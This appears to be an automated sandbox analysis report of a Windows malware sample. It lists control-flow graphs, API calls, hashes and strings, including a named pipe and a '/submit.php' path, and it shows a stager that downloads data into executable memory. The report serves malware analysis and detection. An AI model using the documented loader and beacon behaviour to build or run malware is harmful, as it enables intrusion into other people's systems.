                control_flow_graph 370 40df90-40df93 371 40df9d-40dfa1 370->371 372 40dfa3-40dfab 371->372 373 40dfad 371->373 372->373 374 40df95-40df9a 373->374 375 40dfaf 373->375 374->371 376 40dfb2-40dfb9 375->376 378 40dfc5 376->378 379 40dfbb-40dfc3 376->379 378->376 380 40dfc7-40dfca 378->380 379->378 381 40dfcc-40dfda 380->381 382 40dfdf-40dfec 380->382 383 40e016-40e031 381->383 384 40dfdc 381->384 392 40e006-40e014 call 40df52 382->392 393 40dfee-40dff0 382->393 385 40e062-40e065 383->385 384->382 387 40e067-40e068 385->387 388 40e06a-40e070 385->388 390 40e049-40e04d 387->390 391 40e077-40e07b 388->391 394 40e033-40e036 390->394 395 40e04f-40e052 390->395 396 40e0c7-40e135 VirtualProtect * 2 call 40e14a 391->396 397 40e07d-40e095 LoadLibraryA 391->397 392->371 399 40dff3-40dffa 393->399 394->388 400 40e038 394->400 395->388 403 40e054-40e058 395->403 413 40e13a-40e13f 396->413 398 40e097-40e09e 397->398 398->391 404 40e0a0-40e0b6 GetProcAddress 398->404 414 40e004 399->414 415 40dffc-40e002 399->415 405 40e039-40e03d 400->405 403->405 408 40e05a-40e061 403->408 409 40e0c1 ExitProcess 404->409 410 40e0b8-40e0bf 404->410 405->390 412 40e03f-40e041 405->412 408->385 410->398 412->390 416 40e043-40e047 412->416 413->413 417 40e141-40f044 413->417 414->392 414->399 415->414 416->390 416->395
                APIs
                • LoadLibraryA.KERNEL32 ref: 0040E08F
                • GetProcAddress.KERNEL32 ref: 0040E0AD
                • VirtualProtect.KERNELBASE(?,?,?,-00000003), ref: 0040E0F2
                • VirtualProtect.KERNELBASE ref: 0040E110
                Memory Dump Source
                • Source File: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: ProtectVirtual$AddressLibraryLoadProc
                • String ID:
                • API String ID: 3300690313-0
                • Opcode ID: 6e10822fc425ce4a17b75e591643631d84c9e050e16756b2b447b2e25db0e5ea
                • Instruction ID: 8223ee606f915a237f54ec48d54bed82f464fbc4f52c26bf22d381cc6806c48b
                • Opcode Fuzzy Hash: 6e10822fc425ce4a17b75e591643631d84c9e050e16756b2b447b2e25db0e5ea
                • Instruction Fuzzy Hash: 3C418C72B501A145DB259BB5ED803E86710A7017B8F0C4B37DBB9677C6D6BC885BC308

                Control-flow Graph

                control_flow_graph 420 160109-160126 InternetConnectA 421 160181-160187 call 160128 420->421 424 1601c2-1601d8 421->424 425 160189-16018e 421->425 428 1601db-1601df 424->428 429 160208-16020b 424->429 426 160157 425->426 427 160190 425->427 426->421 432 1601e1-1601e4 428->432 433 16021b-16021e 428->433 430 160280-160288 429->430 431 16020d-160219 429->431 435 160289-16029a 430->435 431->433 436 1601e6-1601f2 432->436 437 16024f-160252 432->437 434 160220-160223 433->434 433->435 438 160254 434->438 439 160225-16024a 434->439 445 1602b9-1602c0 435->445 441 1601f4 436->441 442 160255-16025c 436->442 437->438 440 1601fa-160205 437->440 438->442 446 16024c 439->446 440->429 443 1601f6 441->443 444 16025f-160263 441->444 447 1602d1-1602d3 442->447 448 16025e 442->448 443->440 449 1602c6-1602ce 445->449 446->445 451 16024e 446->451 450 1602d4 447->450 448->444 448->446 452 1602d5-1602d6 450->452 453 160329-16032f 450->453 454 1602d0 452->454 455 1602d8-1602fd 452->455 456 160331-16034e InternetReadFile 453->456 454->447 454->450 455->449 457 1602ff-16030b 455->457 458 160306-160307 456->458 459 160350-160358 456->459 460 16030e-160328 VirtualAlloc 457->460 458->460 459->456 461 16035a-160364 459->461 460->453
                APIs
                • InternetConnectA.WININET(00000003,00000003,00000002,00000001), ref: 00160124
                  • Part of subcall function 00160128: HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 00160143
                Memory Dump Source
                • Source File: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_160000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ConnectHttpInternetOpenRequest
                • String ID:
                • API String ID: 1341064763-0
                • Opcode ID: 49c3c1a397a546ca3137cb3f3a8aa769bddfb87c8d24a4b713d18e2e8d6569d4
                • Instruction ID: 55882e68d33602f6e7d57987d8e6dea50c7d33e191a51b7a166417253c3ecb44
                • Opcode Fuzzy Hash: 49c3c1a397a546ca3137cb3f3a8aa769bddfb87c8d24a4b713d18e2e8d6569d4
                • Instruction Fuzzy Hash: 5451EB3611D6D51FC7278B689DB53EB7B90FF4A315B28016CE09287183C7A1C966C34A

                Control-flow Graph

                APIs
                • malloc.MSVCRT ref: 004017B9
                • SleepEx.KERNELBASE ref: 004017CD
                  • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                  • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                  • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                • GetTickCount.KERNEL32 ref: 004017FC
                • CreateThread.KERNEL32 ref: 00401885
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$\\.\pipe\MSSE-7265-server$e$i$p$p
                • API String ID: 3660650057-1669488359
                • Opcode ID: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
                • Instruction ID: b1b191c08856ce7a5ac3e1961f061f1fb3c952ac0291ac520aaac2e6cde2bc09
                • Opcode Fuzzy Hash: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
                • Instruction Fuzzy Hash: BB11E1B2214A80C6F714DF62F84975BBBA0F384749F44412ADB49277A8CB7CC445CF48

                Control-flow Graph

                control_flow_graph 181 388ca74-388cba2 call 389473c call 389489c * 2 call 3899a24 call 3899a34 * 2 call 3899a04 * 2 call 3899a24 * 2 call 389d1c8 call 3899a04 * 3 call 3899a34 call 389a728 call 389ca38 * 2 call 388eff8 220 388cba9-388cbbe call 3899a04 call 388ee1c 181->220 221 388cba4 call 389ba2c 181->221 227 388cbc0 call 389ba2c 220->227 228 388cbc5-388cbd3 call 388ee30 220->228 221->220 227->228 232 388cbda-388cbe1 call 388eeac 228->232 233 388cbd5 call 389ba2c 228->233 237 388cbe8-388cc1b call 3899a34 call 3899a04 call 389d1c8 232->237 238 388cbe3 call 389ba2c 232->238 233->232 246 388cc1d call 389ba2c 237->246 247 388cc22-388cc56 call 3899a04 call 389ca38 call 3899a04 call 38943b0 237->247 238->237 246->247 257 388ce48-388ce6c call 389d188 call 389ba2c 247->257 258 388cc5c-388cc68 247->258 260 388cc6d-388cd10 call 389a328 call 389d57c call 389a328 call 389d57c * 2 call 388e724 call 3899a04 call 388e6d0 258->260 280 388cd12-388cd20 call 3899314 260->280 281 388cd34-388cd37 260->281 290 388cd2e-388cd31 280->290 291 388cd22-388cd2c call 38973f8 280->291 282 388cd39-388cd5c call 3895220 call 3899a04 281->282 283 388cdb7 281->283 299 388cd5e 282->299 300 388cd63-388cd84 call 3890bbc call 3893894 call 3893314 call 388eff8 282->300 286 388cdbc-388cdc8 call 388e6a4 call 388eff8 283->286 301 388cdca call 389ba2c 286->301 302 388cdcf-388cdef call 389a26c 286->302 290->281 291->281 299->300 327 388cd8e-388cd95 300->327 328 388cd86-388cd89 call 388f0bc 300->328 301->302 309 388cdf1 call 389ba2c 302->309 310 388cdf6-388cdfe 302->310 309->310 310->257 313 388ce00-388ce08 310->313 315 388ce0a-388ce1b 313->315 316 388ce36 call 3891414 313->316 319 388ce1d-388ce2c call 388efd8 315->319 320 388ce2e 315->320 323 388ce3b-388ce42 316->323 325 388ce30-388ce32 319->325 320->325 323->257 323->260 325->316 326 388ce34 325->326 326->316 327->286 331 388cd97-388cdb5 call 388e6a4 call 388e724 call 388e8d8 327->331 328->327 331->286
                APIs
                  • Part of subcall function 0389473C: malloc.LIBCMT ref: 03894758
                • malloc.LIBCMT ref: 0388CB1E
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                  • Part of subcall function 0389CA38: malloc.LIBCMT ref: 0389CA88
                  • Part of subcall function 0389CA38: realloc.LIBCMT ref: 0389CA97
                  • Part of subcall function 0388EFF8: GetLocalTime.KERNEL32 ref: 0388F017
                • malloc.LIBCMT ref: 0388CC10
                • _snprintf.LIBCMT ref: 0388CC8E
                • _snprintf.LIBCMT ref: 0388CCB6
                • free.LIBCMT ref: 0388CE4B
                  • Part of subcall function 03895220: GetTickCount.KERNEL32 ref: 03895232
                  • Part of subcall function 03895220: GetTickCount.KERNEL32 ref: 0389524A
                  • Part of subcall function 03895220: GetTickCount.KERNEL32 ref: 03895768
                  • Part of subcall function 03895220: GetTickCount.KERNEL32 ref: 0389577E
                  • Part of subcall function 03895220: shutdown.WS2_32 ref: 0389579D
                  • Part of subcall function 03895220: shutdown.WS2_32 ref: 038957B2
                  • Part of subcall function 03895220: closesocket.WS2_32 ref: 038957BC
                  • Part of subcall function 03895220: free.LIBCMT ref: 038957DC
                  • Part of subcall function 03895220: free.LIBCMT ref: 038957F1
                • _snprintf.LIBCMT ref: 0388CCDD
                  • Part of subcall function 0389BA2C: Sleep.KERNEL32 ref: 0389BA6F
                  • Part of subcall function 0389BA2C: ExitThread.KERNEL32 ref: 0389BA79
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTickmalloc$_snprintffree$_errnoshutdown$AllocExitHeapLocalSleepThreadTime_callnewhclosesocketrealloc
                • String ID: /submit.php
                • API String ID: 1707894466-1804779596
                • Opcode ID: 10656198658d24da70f1d1fe09ccb68bf04666c12815a9cb96f16df0a35652ad
                • Instruction ID: a77fe88197966f75317027c027bf313dc1eb4ecf1740cde6b3bc39c057ff5ccd
                • Opcode Fuzzy Hash: 10656198658d24da70f1d1fe09ccb68bf04666c12815a9cb96f16df0a35652ad
                • Instruction Fuzzy Hash: 5891A02970078146EF14FBF9A4507AE76E1EB89784F5880AA9D4ACF758EF38C509C712

                Control-flow Graph

                control_flow_graph 353 160128-16014e HttpOpenRequestA 354 16014f-16016b 353->354 356 160171-160174 354->356 357 16030e-16032f VirtualAlloc 354->357 358 160306-160307 356->358 359 16017a 356->359 361 160331-16034e InternetReadFile 357->361 358->357 359->354 361->358 362 160350-160358 361->362 362->361 363 16035a-160364 362->363
                APIs
                • HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 00160143
                • VirtualAlloc.KERNELBASE ref: 00160328
                • InternetReadFile.WININET(00160136,00160136), ref: 00160346
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_160000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                • String ID: U.;
                • API String ID: 1187293180-4213443877
                • Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                • Instruction ID: 751ff6e032cb7076eb5f9a7f01308509fe058f99036cb962a1ca986c7553b19d
                • Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                • Instruction Fuzzy Hash: A8118E6034980D0BE61D94AE7C5A73711CAD7D8766F25812FB40EC3395EE54CC928029

                Control-flow Graph

                control_flow_graph 364 401704-40175c CreateFileA 365 40179c-4017a5 364->365 366 40175e-401760 364->366 367 401781-40178f CloseHandle 366->367 368 401762-40177f ReadFile 366->368 367->365 368->367 369 401791-40179a 368->369 369->366
                APIs
                Strings
                • \\.\pipe\MSSE-7265-server, xrefs: 00401723
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: File$CloseCreateHandleRead
                • String ID: \\.\pipe\MSSE-7265-server
                • API String ID: 1035965006-1889910488
                • Opcode ID: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                • Instruction ID: 40b2c8f30f00ef97869f90130fa51706c158e82a26dd4cfec866ebc6162fc2d5
                • Opcode Fuzzy Hash: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                • Instruction Fuzzy Hash: 2101F77531460186E7219B16F90471776A0B394BA4F648339EFA917BD4DB7DC50ACB08

                Control-flow Graph

                control_flow_graph 462 388ec4c-388ec87 call 388ed50 call 38b0660 467 388ec89-388ec8b 462->467 468 388ec90-388eccf WSAIoctl 462->468 469 388ed2e-388ed42 467->469 470 388ecec-388ecf6 468->470 471 388ecd1-388ece8 468->471 472 388ecf8 470->472 473 388ed23-388ed26 call 38b05e8 470->473 471->470 474 388ecfd-388ed07 472->474 478 388ed2c 473->478 476 388ed09-388ed0c 474->476 477 388ed0e-388ed1a 474->477 476->477 479 388ed1e 476->479 477->473 480 388ed1c 477->480 478->469 479->473 480->474
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: IoctlSocketStartupclosesocket
                • String ID:
                • API String ID: 365704328-0
                • Opcode ID: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
                • Instruction ID: 831ac441a258f6f320c87e1950613cb069c72813566492f454f75a1aeae76c7f
                • Opcode Fuzzy Hash: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
                • Instruction Fuzzy Hash: 7B21C17270478482D720DF68F480B5AB7A9F3887E8F5486A5EE9D83B88DF3CD5058B00

                Control-flow Graph

                control_flow_graph 481 401595-4015c5 VirtualAlloc 482 4015c7-4015c9 481->482 483 4015e0-40162c call 401563 VirtualProtect CreateThread 482->483 484 4015cb-4015de 482->484 484->482
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: Virtual$AllocCreateProtectThread
                • String ID:
                • API String ID: 3039780055-0
                • Opcode ID: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                • Instruction ID: a871edb487987511a762a7aedd3aa3d9a3b96542bc8ba466cbe2f33faf2e38cc
                • Opcode Fuzzy Hash: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                • Instruction Fuzzy Hash: 3D012B9231558051E7249B73AC08B9AAA91A38DBC9F48C139EF4B5BBA5DA3CC505C708

                Control-flow Graph

                control_flow_graph 487 4024e0-4024fa call 402c50 490 402521-40252b 487->490 491 4024fc-4024ff 487->491 491->490 492 402501-40251a call 402a80 491->492 495 402530-402564 492->495 496 40251c 492->496 497 40259d-4025a8 call 402be0 495->497 496->490 500 402570-40259b 497->500 501 4025aa-4025ad 497->501 500->497 502 4025c0 500->502 501->496 503 4025b3-4025b6 501->503 504 4025c5-4025d5 RtlAddFunctionTable 502->504 503->504 504->496
                APIs
                  • Part of subcall function 00402A80: strncmp.MSVCRT ref: 00402AF5
                • RtlAddFunctionTable.KERNEL32 ref: 004025CF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: FunctionTablestrncmp
                • String ID: .pdata
                • API String ID: 2984418122-4177594709
                • Opcode ID: c6e18efcf58cff98a9045297e69aa62fcdf93a67b7625ead96cd88321bade274
                • Instruction ID: e5bd22c7440726ce30c9019276c637b3f75865ec35e4e6d161c99b8f67d9ebd7
                • Opcode Fuzzy Hash: c6e18efcf58cff98a9045297e69aa62fcdf93a67b7625ead96cd88321bade274
                • Instruction Fuzzy Hash: 0511E4B2B11640AAFB15AF25DF2835A7751A788B94F58843ADF08277C4FABCC841C70C

                Control-flow Graph

                control_flow_graph 505 1602cf 506 1602d0 505->506 507 1602d4 506->507 508 1602d1-1602d3 506->508 509 1602d5-1602d6 507->509 510 160329-16032f 507->510 508->507 509->506 511 1602d8-1602fd 509->511 512 160331-16034e InternetReadFile 510->512 513 1602c6-1602ce 511->513 514 1602ff-16030b 511->514 515 160306-160307 512->515 516 160350-160358 512->516 517 16030e-160328 VirtualAlloc 514->517 515->517 516->512 518 16035a-160364 516->518 517->510
                APIs
                • VirtualAlloc.KERNELBASE ref: 00160328
                • InternetReadFile.WININET(00160136,00160136), ref: 00160346
                Memory Dump Source
                • Source File: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_160000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AllocFileInternetReadVirtual
                • String ID:
                • API String ID: 3591508208-0
                • Opcode ID: f47fa78e1a991d802dd4d353d04a50c163f7d50401d5ec175728bd6b7eb19422
                • Instruction ID: d0f884f866c1d3fb1d3f4f4075e719864c4262cf32adbf4e852530cdd7eda062
                • Opcode Fuzzy Hash: f47fa78e1a991d802dd4d353d04a50c163f7d50401d5ec175728bd6b7eb19422
                • Instruction Fuzzy Hash: 2C114E3120450A0FD72A99C4BCA53B77395EB88325F70403FE44EC7242DA64CC67D356
                APIs
                  • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                  • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                  • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                  • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                • SleepEx.KERNELBASE(?,?,00000001,004013B4), ref: 0040305D
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: Sleep$CountCreateThreadTickmalloc
                • String ID:
                • API String ID: 345437100-0
                • Opcode ID: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                • Instruction ID: 8364c3e29ff4e62ba415e97045e67fc6fb748e7a580f304519b0ce082c56ecd4
                • Opcode Fuzzy Hash: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                • Instruction Fuzzy Hash: B4C022A030208880EF08B3B280AB32E0A080B08388F0C083FEF0B322E28C3CC000030E
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                • Instruction ID: a743adea046cbcdbe664945421fd1e17160cbf4519ce10af676c80aa3e6907ac
                • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                • Instruction Fuzzy Hash: 4D418970618B499FDB84DF2CC488A2ABBE1FB98355F44196EF489C7360D734D981CB06
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_invalid_parameter_noinfo
                • String ID: U
                • API String ID: 3902385426-4171548499
                • Opcode ID: b04278913bfdb2d86bd3fcf39d809e6593f3198cef3e5a228a6e35f7ed4bf705
                • Instruction ID: 8de59dba9c6b2139ae8c7a1a23e9036743507b11ab1ac6917d3c95410e6c3b32
                • Opcode Fuzzy Hash: b04278913bfdb2d86bd3fcf39d809e6593f3198cef3e5a228a6e35f7ed4bf705
                • Instruction Fuzzy Hash: 43022272214B8586EF20CFAED48435EB765F385B88F684156EA89C7B24DFBCD146CB10
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: htonl$ErrorLast
                • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                • API String ID: 3987040240-1833344708
                • Opcode ID: d68524a15420e28e89f7ae59b3e64a120402265f83246d642d5de9aedb9eafd5
                • Instruction ID: e21dd5bacc1809d1804c2156d2d927bc178ecfd7537628b5917aae25bab926d7
                • Opcode Fuzzy Hash: d68524a15420e28e89f7ae59b3e64a120402265f83246d642d5de9aedb9eafd5
                • Instruction Fuzzy Hash: A1722A15B2474586FF28DBE6A850379A291F789B84F8C41E7ED0EC7B58EE39C642C701
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 038A0EF1
                  • Part of subcall function 0389F454: _getptd.LIBCMT ref: 0389F46A
                  • Part of subcall function 0389F454: __updatetlocinfo.LIBCMT ref: 0389F49F
                  • Part of subcall function 0389F454: __updatetmbcinfo.LIBCMT ref: 0389F4C6
                • _errno.LIBCMT ref: 038A0EF6
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • _fileno.LIBCMT ref: 038A0F23
                  • Part of subcall function 038A3914: _errno.LIBCMT ref: 038A391D
                  • Part of subcall function 038A3914: _invalid_parameter_noinfo.LIBCMT ref: 038A3928
                • write_multi_char.LIBCMT ref: 038A155F
                • write_string.LIBCMT ref: 038A157C
                • write_multi_char.LIBCMT ref: 038A1599
                • write_string.LIBCMT ref: 038A15F8
                • write_string.LIBCMT ref: 038A162F
                • write_multi_char.LIBCMT ref: 038A1651
                • free.LIBCMT ref: 038A1665
                • _isleadbyte_l.LIBCMT ref: 038A1736
                • write_char.LIBCMT ref: 038A174C
                • write_char.LIBCMT ref: 038A176D
                • _errno.LIBCMT ref: 038A1870
                • _invalid_parameter_noinfo.LIBCMT ref: 038A187B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID: $@
                • API String ID: 3318157856-1077428164
                • Opcode ID: aca5eff7b48e60a8575da89cd2ec2425052cdd0f99735d1b91aa5be48c8f36fa
                • Instruction ID: 1897a01ee32fd283fd75b4c5055da408a3549694d2cf17511adc746fd3f01c35
                • Opcode Fuzzy Hash: aca5eff7b48e60a8575da89cd2ec2425052cdd0f99735d1b91aa5be48c8f36fa
